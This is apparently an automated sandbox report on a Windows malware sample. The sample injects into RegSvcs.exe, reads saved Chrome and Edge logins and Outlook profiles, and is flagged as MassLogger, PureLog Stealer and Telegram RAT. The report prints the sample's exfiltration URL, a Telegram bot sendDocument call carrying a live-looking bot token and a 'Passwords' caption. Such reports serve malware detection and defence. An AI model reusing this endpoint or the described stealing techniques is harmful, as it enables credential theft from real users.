Code function: 0_2_00623D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00623D19

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00653920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00653920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

2_2_004019F0

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0063E01E LoadLibraryA,GetProcAddress,

0_2_0063E01E

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_014DE7F0 mov eax, dword ptr fs:[00000030h]	0_2_014DE7F0
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_014DFE40 mov eax, dword ptr fs:[00000030h]	0_2_014DFE40
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_014DFEA0 mov eax, dword ptr fs:[00000030h]	0_2_014DFEA0

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0065A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0065A66C

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_006481AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006481AC
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00648189 SetUnhandledExceptionFilter,	0_2_00648189
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C3D008

Jump to behavior

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0065B106 LogonUserW,

0_2_0065B106

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00623D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00623D19

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0066411C SendInput,keybd_event,

0_2_0066411C

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_006674E7 mouse_event,

0_2_006674E7

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\nfKqna8HuC.exe"

Jump to behavior

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

0_2_0065A66C

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_006671FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_006671FA

Source: nfKqna8HuC.exe	Binary or memory string: Shell_TrayWnd
Source: nfKqna8HuC.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_006465C4 cpuid

0_2_006465C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0067091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0067091D

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0069B340 GetUserNameW,

0_2_0069B340

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_00651E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00651E8E

Source: C:\Users\user\Desktop\nfKqna8HuC.exe

Code function: 0_2_0063DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0063DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: nfKqna8HuC.exe	Binary or memory string: WIN_81
Source: nfKqna8HuC.exe	Binary or memory string: WIN_XP
Source: nfKqna8HuC.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: nfKqna8HuC.exe	Binary or memory string: WIN_XPe
Source: nfKqna8HuC.exe	Binary or memory string: WIN_VISTA
Source: nfKqna8HuC.exe	Binary or memory string: WIN_7
Source: nfKqna8HuC.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2fb0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c21bc6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4066458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4065570.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.408e790.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2c20cde.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3303343228.0000000002FB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302928287.0000000002E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3304747884.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3302818296.0000000002BE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5596, type: MEMORYSTR

Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_00678C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00678C4F
Source: C:\Users\user\Desktop\nfKqna8HuC.exe	Code function: 0_2_0067923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0067923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	137 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	2 Valid Accounts	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Access Token Manipulation	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	212 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
nfKqna8HuC.exe	57%	Virustotal		Browse
nfKqna8HuC.exe	83%	ReversingLabs	Win32.Trojan.AutoitInject
nfKqna8HuC.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://api.telegram.org/bot8152393919:AAFcv9D2OhgJkwW5R_jm9t4Pm6asb_5vQdk/sendDocument?chat_id=1437092720&caption=user%20/%20Passwords%20/%208.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://checkip.dyndns.org	RegSvcs.exe, 00000002.00000002.3303484774.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.0000000003140000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3303484774.000000000314C000.00000004.00000800.00020000.00000000.sdmp	false	high
